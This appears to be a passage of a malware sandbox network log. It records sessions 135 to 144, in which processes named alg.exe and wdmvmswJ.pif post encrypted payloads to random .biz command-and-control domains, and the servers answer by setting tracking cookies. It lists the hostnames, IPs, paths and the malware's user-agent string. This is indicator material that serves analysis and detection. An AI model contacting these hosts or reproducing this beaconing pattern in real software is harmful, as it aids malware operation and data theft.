                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.179537058 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8b252a8947eee1a67848fe753c657be2|173.254.250.82|1730445896|1730445896|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        135192.168.2.84998818.208.156.248804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.212687969 CET358OUTPOST /cqrtypmijgihv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.212754965 CET778OUTData Raw: 56 4e 2f 64 aa d7 48 3e fe 02 00 00 18 d1 15 c0 e7 56 4f 2d b4 f3 8c ff 43 41 17 51 0f 3f ac 4e b8 e3 39 23 3f 23 56 92 a0 0f 6d 75 ec fe 5f a7 1d 68 8b 7e 36 7e f0 55 cd 1b 5b 73 20 35 5e c6 5f f9 46 83 dc ac 2c ed 4f b6 fd 62 98 75 31 d1 d4 25
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: VN/dH>VO-CAQ?N9#?#Vmu_h~6~U[s 5^_F,Obu1%=4Im;B]Kr/Q{R}?Jjc>n]3,8h+).2bYJz*qidhY 4+W*I_*;.2r
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.882668972 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d5b1cc592213592483bc277028296529|173.254.250.82|1730445896|1730445896|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        136192.168.2.84998954.244.188.177804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.213047981 CET346OUTPOST /xcccv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.213066101 CET802OUTData Raw: 8a f1 4b bc 5b 5b af e9 16 03 00 00 e2 4f 85 cd 22 15 ea 0c 37 c2 81 59 bb a9 98 d8 0a 00 91 2f 91 03 26 e7 51 3a ad 1d da 97 e4 44 94 3d 5e 4d ad ef 2b 13 f1 7f b1 9f 47 92 26 2e 86 cf 10 73 90 da 74 67 0a 92 61 86 0d 59 0a 67 fe 0b 0e 7f 9f c1
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K[[O"7Y/&Q:D=^M+G&.stgaYgK~&A[u?'4P?wd(o0b$YZR,K--GMcMT7My{W0WiAG2:Rhj-r6~nVEV6}FK
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.029891968 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=50f83f1be2e192ce3db2c2e34f2873fe|173.254.250.82|1730445896|1730445896|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        137192.168.2.84999554.244.188.177804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.051839113 CET351OUTPOST /seopbnrlp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.051839113 CET802OUTData Raw: 7f c0 30 f7 4c 84 a3 9e 16 03 00 00 56 11 18 51 60 57 d8 b3 df 0c de 75 c5 8d bd b3 18 95 85 68 23 9f 59 8d 1b 77 41 61 c5 8c 1c bd 2d 8b ec 12 1a 9f 98 3a 6d 8c f8 ce 98 27 36 04 83 e3 26 69 2c ae b1 f3 e0 c2 37 5c cb 3f 66 0b 34 bd c7 42 25 6a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0LVQ`Wuh#YwAa-:m'6&i,7\?f4B%je#dNO:ei&IdcM0v`;,s(l~$$H)vUabH{Bl%|mb$!/[~o}[|p2=INr
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.888020992 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8fdb635748cf479c1a1d76fd83e2fea5|173.254.250.82|1730445897|1730445897|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        138192.168.2.84999618.246.231.120804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.082617044 CET344OUTPOST /vuf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.082634926 CET778OUTData Raw: cb 6d ba eb fe 02 ab 43 fe 02 00 00 ae 58 21 ff 36 c7 7a f1 ca 1e 8d 84 fc 1f 1b f1 d3 2c bb 19 9d 01 e0 99 b1 55 53 d3 c8 64 8c ff db 9d bd ab 10 94 7b 40 f1 71 88 0a 5d a9 fb 73 d4 e0 3a d7 7f dc 8a 81 1c db 3d 3f 4d 0d 43 cf 8e 1d 1b 56 24 1f
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: mCX!6z,USd{@q]s:=?MCV$QwqX~t7C+h1eLz65`@R$p8(<w`sy,W6C[E!>f)8RwsJi)I9w\ FWP\vZ
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.897125959 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=15e46b9d62267257fb41ed4b107b311b|173.254.250.82|1730445897|1730445897|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        139192.168.2.85000218.246.231.120804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.909405947 CET347OUTPOST /lqskha HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.909451962 CET802OUTData Raw: 8c 28 af 38 b1 b5 4c cf 16 03 00 00 36 10 2d 43 5e 5f 69 15 df 61 8f 1e e8 7e 12 94 c5 d1 36 39 d6 88 5f f9 cc 08 09 be 39 96 dc 41 c8 3e 0e 14 54 6c 16 cd 5a e2 27 bd 98 5f c8 c7 c9 69 0d 67 d5 98 45 87 4e 24 f2 c8 fb a5 e6 34 18 b8 b5 c5 c1 0c
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (8L6-C^_ia~69_9A>TlZ'_igEN$4NZ*7hbO'ysLi_osez<6,pR2E9zAn`A'PV~Fn(r?OL\3dC:=%)x;gTC?Z(mVU3j,
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.730731964 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2d37447abee9b5bb4942866c22f8685a|173.254.250.82|1730445898|1730445898|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        140192.168.2.85000344.221.84.105804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.173311949 CET345OUTPOST /k HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.173382998 CET778OUTData Raw: 08 7c bb db d4 08 81 86 fe 02 00 00 e6 6c 19 dd 9e 32 50 2e 2b db 88 55 aa 72 fc 20 77 b1 98 67 d0 17 58 a1 29 7c ab 53 2f f3 4f 4e fa 13 9b 7d f8 15 73 bb 3d 02 df dc 7e 03 cc b8 62 fd a4 44 1d 9a 89 15 f5 fb bb 39 71 56 ed 3e 3f 3a 14 c5 17 32
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |l2P.+Ur wgX)|S/ON}s=~bD9qV>?:2O+?eb{e]u~O+U4.L1g<t=Nw1,A wiW=5-Rx6[f?+GV,cl;W70?J1:y8GZnE`
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.825813055 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=09db79aa9528da7dab1aea2b2a42544c|173.254.250.82|1730445898|1730445898|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        141192.168.2.85000818.208.156.248804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.774086952 CET355OUTPOST /poufjqlcmnc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.774107933 CET802OUTData Raw: a3 9c f3 15 6f 93 41 d9 16 03 00 00 ba 2e 36 42 93 1e 4d 85 71 21 e2 8d 0d 46 22 19 d4 12 59 5e c7 e4 58 dd 6d 92 d4 ec 4a 21 1e 99 ac 27 25 55 5d ce 4f f0 e8 75 56 e4 dc 73 36 98 6c bc 51 58 91 74 3f d3 b5 53 7e 3f e9 2e bc 29 c6 f1 87 76 53 b2
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: oA.6BMq!F"Y^XmJ!'%U]OuVs6lQXt?S~?.)vS('7Ta0MaU~wD:nQlr8:'_Z0;Bq.)-Fae&/sVGl."}G4ITG9,m/P>>pz
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.453759909 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=88094ed4af42467137a30bdcfc7cd225|173.254.250.82|1730445899|1730445899|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        142192.168.2.85001054.244.188.177804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.050930023 CET357OUTPOST /fwiohktfcqxxnbh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.050955057 CET778OUTData Raw: 7c 9b 46 62 29 34 e5 8b fe 02 00 00 cc a6 17 0a ec 5f 2c ad 5c e5 7b 5a 3e a7 e9 56 7d 29 e6 d7 ec 1e 47 0c 69 26 fc 54 cc 58 86 68 ae d9 a0 8c 06 74 45 df 6c 17 7c 29 02 2c 05 e7 a1 63 19 6f 9f ac 4b 39 7c 8e 79 9d 61 cd e1 75 d2 5f d5 27 00 90
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |Fb)4_,\{Z>V})Gi&TXhtEl|),coK9|yau_'wDEhL $tbLH]-P|z"bW%EWPn),ttr?@=P(JCK~227&a:5@16aMK5<mg3S,Z-4~)/"EAs
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.897660971 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4c43951725bfff7cb09d416a938cfa25|173.254.250.82|1730445899|1730445899|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        143192.168.2.85001444.221.84.105804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.479160070 CET345OUTPOST /fvf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.479181051 CET802OUTData Raw: 3a 35 ad 77 33 a7 89 97 16 03 00 00 0e d3 df f7 a8 6b 04 2a 6d 77 e2 f5 df 41 fc 11 40 9e 7a e9 06 65 49 52 c6 96 9e e0 b9 ee 79 53 c5 08 93 9a 46 ae e1 f9 61 e4 52 3c 10 60 3e f2 0b 34 59 85 f5 17 df e1 1e 55 48 1c 3c ad 68 21 4f 7f 61 06 a7 c3
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :5w3k*mwA@zeIRySFaR<`>4YUH<h!Oa|a?6_J5RUCQM/cnB{vz\Q3vL=x0usg!bNQ%{2d y$\pJm5.;64(bux:vPWcS|?]
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.139458895 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:25:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=f4601d14df2076c4454da028d31c1558|173.254.250.82|1730445900|1730445900|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        144192.168.2.85001772.52.178.23804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.173907995 CET352OUTPOST /pdgkdbbj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
